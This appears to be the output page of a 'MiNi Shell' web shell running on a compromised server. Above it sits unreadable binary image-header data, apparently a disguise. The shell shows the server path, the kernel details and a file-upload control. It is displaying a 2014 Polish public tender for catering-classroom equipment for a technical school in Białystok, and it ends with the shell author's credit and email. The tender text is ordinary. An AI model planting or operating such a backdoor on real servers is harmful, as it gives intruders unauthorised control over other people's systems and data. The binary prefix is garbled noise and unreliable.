JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/145622-N-2014.html

<p class="kh_header"><b>Białystok: Dostawa sprzętu i wyposażenie pracowni gastronomicznej</b><br>
<b>Numer ogłoszenia: 145622 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Technicznych im. gen. Władysława Andersa w Białymstoku , ul. Stołeczna 21, 15-879 Białystok, woj. podlaskie, tel. 85 7421213, faks 85 7422923.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zst.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu i wyposażenie pracowni gastronomicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia ujęto w poniższych poz. 63 - 155:
63	Kuchenka mikrofalowa gastronomiczna
obudowa ze stali nierdzewnej, wyświetlacz cyfrowy, timer, podwójne źródło emisji mikrofal, funkcja grill, poj. 25 l, wymiary max 52x45x32cm, zasilanie 230V, pobór mocy max 1500W, moc wyjściowa do 1000W	2 szt.
64	Ekspres ciśnieniowy jednogrupowy automatyczny
podgrzewacz do filiżanek, dysza do wrzątku, dysza do pary, dysza do spieniania mleka, poj. bojlera min. 3 l, zasilanie 230V, moc 1800W, funkcja samooczyszczania,
szerokość do 40cm, głębokość do 55cm	1 szt.
65	Jezdny dystrybutor grzewczy do talerzy
średnice talerzy: 24, 25, 28, 30cm, max wysokość stosu talerzy to 50 cm, pokrywa półokrągła, 230V, moc 450W, wymiary max 45x45x95cm, hamulec na koła	1 szt.
66	Noże ze stali walcowanej z kolorowym uchwytem
komplet 6 sztuk, (w komplecie nóż do obierania warzyw dł. ostrza 9cm, do jarzyn dł. ostrza 12,5cm, nóż kucharski dł. ostrza 20cm, do mięsa dł. ostrza 20cm, do chleba dł. ostrza 23cm - ostrze ząbkowane, do oddzielania kości dł. ostrza 15cm)	6 kompl.
67	Kloc masarski
wykonany z polietylenu na podstawie ze stali nierdzewnej, wymiary blatu 50x40cm grubość min 5cm, wysokość 85cm, w komplecie z tłuczkiem szefa kuchni	1 szt.
68	Mikser profesjonalny
funkcje mieszania, miksowania, krojenia, siekania, rozcierania i ubijania, (opcjonalnie z młynkiem do mielenia), 3 końcówki: nóż gwiazdowy, tarcza do ubijania, tarcza do miksowania, 2 prędkości obrotowe: 10tys/17tys obr/min, moc 200W, długość max 40cm	1 szt.
69	Szufladkowy naświetlacz do jaj
jednorazowa dezynfekcja 30 sztuk jaj, czas naświetlania max 3 minuty,
zasilanie 230V moc max 100W, wymiary max 36x55x25cm
materiał: stal kwasoodporna	1 szt.
70	Blacha stalowa osłaniająca ścianę, stal nierdzewna
grubość 0,8 mm, wym. 75x300cm, mocowanie na kołki rozporowe	6 szt.
71	Uniwersalna zmywarka gastronomiczna
funkcja wyparzania, wbudowane dozowniki na środek myjący i nabłyszczający, podstawa ze ślizgami na kosze, automatyczny zmiękczacz wody, materiał stal nierdzewna
zasilanie 230V, moc max 3,5-3,8kW, wymiary 60x60x85cm	1 szt.
72	Stół ze zlewem dwukomorowym oraz miejscem odkładczym po lewej stronie, stal nierdzewna, zabudowany, drzwi frontowe otwierane, wym: 160x60x85cm	2 szt.
73	Uzdatniacz wody
automatyczna funkcja regeneracji złoża,
ilość uzdatnionej wody pomiędzy regeneracjami min. 1750 litrów
wymiary max 30x58x55cm (szer x gł x wys)	1 szt.
74	Bateria zlewozmywakowa stojąca kolumnowa ze spryskiwaczem do montażu stołowego, przełączanie wody ciepłej/zimnej uchwytowe, obrotowa wylewka, wspornik mocujący do ściany, dwa zawory zwrotne, elastyczny wąż ciśnieniowy w oplocie ze stali nierdzewnej	1 szt.
75	Basen przeznaczony do mycia wyposażenia kuchennego
wykonany ze stali nierdzewnej, wym: 80x60x85cm, głębokość 40-50cm	1 szt.
76	Stół roboczy szkieletowy wykonany ze stali nierdzewnej
miejsce na pojemniki na odpady poprodukcyjne, wym: 100x60x85cm	1 szt.
77	Piec konwekcyjno-parowy elektryczny z podstawą, stal nierdzewna, zasilanie 230V, moc max 2,75kW, sonda temperatury i wskaźniki LED parametrów pracy, blachy i ruszt, funkcje pieczenia w powietrzu, gotowania na parze i w kombinacji, wym. 65x60 (dł. x szer.)	1 szt.
78	Regał gretingowy ociekowy na sprzęt (min 4 półki),
stal nierdzewna, wym: 80x60x180cm	1 szt.
79	Patelnia gastronomiczna stalowa z powłoką teflonową
średnica 28cm, głębokość 48 mm,
nienagrzewający się uchwyt	6 szt.
80	Patelnia aluminiowa z powłoką teflonową platinum do naleśników,
śr. 22cm, wysokość max. 2cm, uchwyt z tworzywa sztucznego	6 szt.
81	kuchnia elektryczna 50cm, z płytą grzewczą, stal nierdzewna, 230V, wskaźnik ciepła resztkowego, termoobieg, rożen	2
82	okap 50x50x12 cm, stal nierdzewna, 3-stopniowa regulacja wyciągu, oświetlenie	3
83	chłodziarko-zamrażarka 2-drzwiowa, kolor szary, pojemność 500l, wysokość max. 180cm, szer. max. 100cm, klasa energetyczna A++, sterowanie elektroniczne, NO-frost, oddzielne systemy chłodząco-wentylujące, z kostkarką i dystrybutorem wody	1
84	schładzarka szokowa, 230V, stal nierdzewna, wysokość max. 75cm	1
85	urządzenie wielofunkcyjne, funkcje: ważenia, siekania, mieszania, miksowania, gotowania (w tym na parze), 230V, 500W, obroty przód-tył, bezstopniowa regulacja mocy, typu termomiks	1
86	blender ręczny elektryczny, moc 200-250W, obroty min. 10 tys./min., wyposażenie: tarcza do ubijania i miksująca, nóż do mięsa i warzyw oraz uniwersalny	2
87	mikser (robot) planetarny z funkcją podgrzewania misy, konstrukcja stalowa, moc min. 300W, pojemność misy min. 4,5l	1
88	krajalnica do wędlin i sera ze stali nierdzewnej, wymiary max. 60x60x50cm (dł. x szer. x wys.)	1
89	kostkarka do lodu, chłodzenie powietrzem, moc 300-350W, wydajność 20 kg/dobę	1
90	waga techniczna, precyzyjna, elektroniczna, rozdzielczość 0,01g, zakres 2kg	1
91	waga kuchenna, stal nierdzewna, płaski korpus, rozdzielczość 1g, zakres 5kg	6
92	maszynka do mięsa z nasadką masarską i przystawkami do szatkowania warzyw, dodatkowe funkcje: młynek żarnowy i wyciskacz pomidorów, moc min. 550W, obudowa z tworzywa sztucznego kolor bez znaczenia, minimum trzy sita 2/5/8mm 	3
93	młynek na odpady, wysokość max. 40cm, do montażu w odpływie	2
94	gofrownica elektryczna, profesjonalna, 230V, do 2,5kW, wymiary max. 30x40cm (dł. x szer.)	1
95	naleśnikarka elektryczna, pojedyncza 230V, do 2kW	1
96	kontakt grill ceramiczny o gładkich płytach grzewczych, 230V, do 1800W	1
97	toster 6-sekcyjny, stal nierdzewna, do 2kW	2
98	półka pod kuchenkę mikrofalową 50x40, stal nierdzewna	1
99	kosz na odpady z pokrywą, poj. 50l, kształt walca, stal nierdzewna, mobilny, otwierany nogą	3
100	termometr elektroniczny z sondą igłową, zakres pomiarowy -50+300°C, długość sondy 120÷150mm	3
101	termometr piekarniczy, elektroniczny, zakres do +300°C, sonda na przewodzie w oplocie stalowym dł. 1m, funkcja czasomierza i alarmu temperatury	3
102	deska do prasowania z systemem aktywnego odsysania pary, zintegrowany przedłużacz, półka na stację pary, antena podtrzymująca przewód	1
103	żelazko ze stacją parową, moc do 2000W, wytwarzanie pary min. 110g/min.	1
104	sokowirówka o mocy min. 800W z funkcją samoczyszczenia sita z miąższu, 2 prędkości z pojemnikiem na sok ok. 1 l., stal nierdzewna, misa zasypowa o dużej średnicy wsadu	2
105	wyciskarka elektryczna do cytrusów, moc min. 180W, ze stali nierdzewnej	2
106	wyciskarka do owoców cytrusowych-mechanizm dźwigniowy ręczny, ze stali nierdzewnej	1
107	blender ręczny elektryczny, moc min. 200W, obroty min. 10 tys./min., wyposażenie: tarcza do ubijania i miksująca, nóż do mięsa i warzyw oraz uniwersalny	2
108	blender barmański z wielobiegowym napędem, z funkcją pulsacyjną, pojemnik szklany o poj. 1,5 l, moc min.400W, nóż ze stali nierdzewnej	2
109	taca kelnerska antypoślizgowa o średnicy ok. 400 mm	3
110	kruszarka do lodu chromowana ręczna z szufelką do lodu	1
111	komplet garnków ze stali nierdzewnej z pokrywkami szklanymi , o podwójnym dnie ( zakres poj. 0.5-5 l. )	6
112	deski HACCP 450x300x10mm, (6 kolorowych desek w stojaku)	6
113	czajnik elektryczny, moc min.2000W, poj. min 2 l, stal nierdzewna	2
114	komplet misek ze stali kwasoodpornej 6-częściowy	6
115	tarka do jarzyn z przystawkami, z pojemnikiem wykonana ze stali kwasoodpornej	6
116	Praska do ziemniaków ze stali nierdzewnej 	6
117	łyżka wazowa ze stali nierdzewnej	6
118	komplet trzepaczek rózgowych o różnej wielkości 3 częściowy, ze stali nierdzewnej	6
119	wyciskacz do czosnku, ze stali nierdzewnej	6
120	łyżka szumówka ze stali nierdzewnej	6
121	garnek do gotowania makaronu spaghetti o poj. 3 l, z sitem i pokrywą, stal nierdzewna	6
122	tłuczek do mięsa ze stali nierdzewnej	6
123	wałek do ciasta ze stali, o szerokości max.350mm	6
124	stolnica drewniana o wymiarach 600x500 mm, z rantem	6
125	ręczny przesiewacz do mąki w obudowie, ze stali nierdzewnej	6
126	komplety talerzy porcelanowych białych do zmywarki, na 6 osób, 4 częściowy (razem 24 sztuki w komplenie), średnice: 16/20/25cm, tależ głęboki 23cm, tłoczony wzór na obrzeżu	6
127	zestaw filiżanek do kawy  z białej porcelany  na 6 osób, do zmywarki, 6 filiżanek + 6 spodków, pojemność 120ml, tłoczony wzór na obrzeżu jak w przypadku talerzy	3
128	zestaw filiżanek do herbaty  na 6 osób z porcelany białej do zmywarki  6 filiżanek + 6 spodków, pojemność 200ml,  tłoczony wzór na obrzeżu jak w przypadku talerzy	3
129	komplet sztućców ze stali nierdzewnej na 6 osób , 6 częściowy, łyżka stołowa, widelec stołowy nóż stołowy, łyżeczka do herbaty/kawy, widelczyk do ciasta, łyżeczka do espresso	3
130	maszynka ręczna do makaronu ze stali nierdzewnej z możliwością wykonania 6 rodzajów (kształtów) makaronu, pokrętło regulacji grubości, przykładowe kształty: nitki, wstążki, płaty lasagne i inne bez znaczenia jakie	1
131	serwetki kelnerskie płócienne o wymiarach 50x50 cm, lniane, kolor ecru	16
132	kafeterka grecka, tygiel do zaparzania kawy o poj. 0,25l, materiał aluminium	1
133	kafeterka włoska, przelewowa, do parzenia kawy o poj. 0,25 l, materiał aluminium	1
134	forma do pieczenia pasztetów i terrin z pokrywką ze stali 	2
135	szybkowar o poj. ok 3l, stal nierdzewna	1
136	forma do gotowania budyniu z przykrywką, porcelanowa	2
137	profesjonalny rękaw zdobniczy cukierniczy ze stalowymi końcówkami, 6 częściowy	2
138	szatkownica ręczna na nóżkach, ze stali kwasoodpornej z uchwytem na surowiec szatkowany	6
139	komplet łopatek do teflonu-4 częściowy	6
140	zabudowa ściany 630x300cm, drzwi przesuwane szt. 5 i nadstawka nad drzwiami wejściowymi do pracowni (z półką w środku), wewnątrz: półki (20 szt.), szuflady (10 szt.) i wieszak na ubrania	1
141	krzesło konferencyjne z pulpitem, materiał - lakierowana sklejka, najlepiej bukowa, kosz pod siedzeniem	16
142	Taca grzewcza prostokątna
płyta ze stali nierdzewnej, automatyczna kontrola temperatury i zabezpieczenie przed przegrzaniem
230V, moc do 1000W, czas rozgrzewania max 10 minut,
czas podgrzewania po odłączeniu zasilania ok. 60 minut, wymiary ok. 60x20x6 cm	2 szt.
143	Witrynka do serwowania z deską, stal nierdzewna,
średnica 38 cm, wkłady chłodzące	4 szt.
144	Stół trapezowy, płyta olcha ciemna, nogi metalowe,
wym. 120x60cm, wysokość 75cm	6 szt.
145	Stół kwadratowy
90x90cm, wys. 75cm, blat z płyty olcha ciemna grubości 2cm, nogi metalowe	3 szt.
146	Krzesło drewniane
wysokość 90cm, wysokość siedziska 45cm, szerokość siedziska 40cm, oparcie ażurowe	14 szt.
147	Krzesło barowe, konstrukcja metalowa,
wysokość siedziska 65-90cm, średnica 35-40cm, pneumatyczny mechanizm podnoszenia, podstawa chromowana, obicie sztuczna skóra w kolorze czarnym	3 szt.
148	Obrus 160x160cm (kolor kremowy) z nakładką 60x160 (kolor czerwony), materiał len	15 szt.
149	Pomocnik kelnerski na kołach
wykonany ze stali nierdzewnej, wymiary 65x50x110cm, 4 pojemniki	3 szt.
150	Wózek transportowy, 90x59x93(wys.)
3-półkowy obciążenie ok. 75kg, materiał stal nierdzewna, 4-skrętne koła, 2 hamulce	2 szt.
151	Szafka na środki czystości i sprzęt porządkowy
wym. 60x50x180cm, materiał stal nierdzewna, drzwi z zamkiem na klucz,	1 szt.
152	Stół roboczy korpusowy ze stali nierdzewnej,
otwierane drzwi, półka w środku, rant z tyłu, 80x60x85cm	4 szt.
153	Stół roboczy korpusowy ze stali nierdzewnej,
moduł 3-ech szuflad, drzwi środkowe przesuwane, półka w środku, bez rantów, 150x60x85cm	6 szt.
154	Lada barowa
materiał: płyta olcha ciemna,
wysokość 120cm, długość 100cm, szerokość 35cm	1 szt.
155	Witryna barowa
materiał: płyta olcha ciemna,
szerokość 80cm, wysokość 120cm. głębokość 20cm,
półki szklane o grubości 8mm szt. 2,	1 szt..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 7 ustawy PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2, 39.11.21.00-1, 39.11.30.00-7, 39.14.11.00-3, 39.14.12.00-4, 39.14.13.00-5, 39.14.14.00-6, 39.14.32.00-8, 39.14.32.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający powyższy warunek oceni wg złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający powyższy warunek oceni wg złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający powyższy warunek oceni wg złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający powyższy warunek oceni wg złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający powyższy warunek oceni wg złożonego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na podstawie oświadczenia, z uwzględnieniem postanowień cz. VII i IX SIWZ, Oferent wykaże również:
1)	pełną zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych,
2)	brak karalności za przestępstwa popełnione umyślnie lub przestępstwa skarbowe</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zst.bialystok.pl/przetargi2.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.zst.bialystok.pl/przetargi2.htm.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2014 godzina 09:00, miejsce: Zespół Szkół Technicznych im. gen. Władysława Andersa w Białymstoku
ul. Stołeczna 21, 15-879 Białystok - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany budżetu Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego i budżetu państwa.
Priorytet IX Rozwój wykształcenia i kompetencji w regionach
Działanie: 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com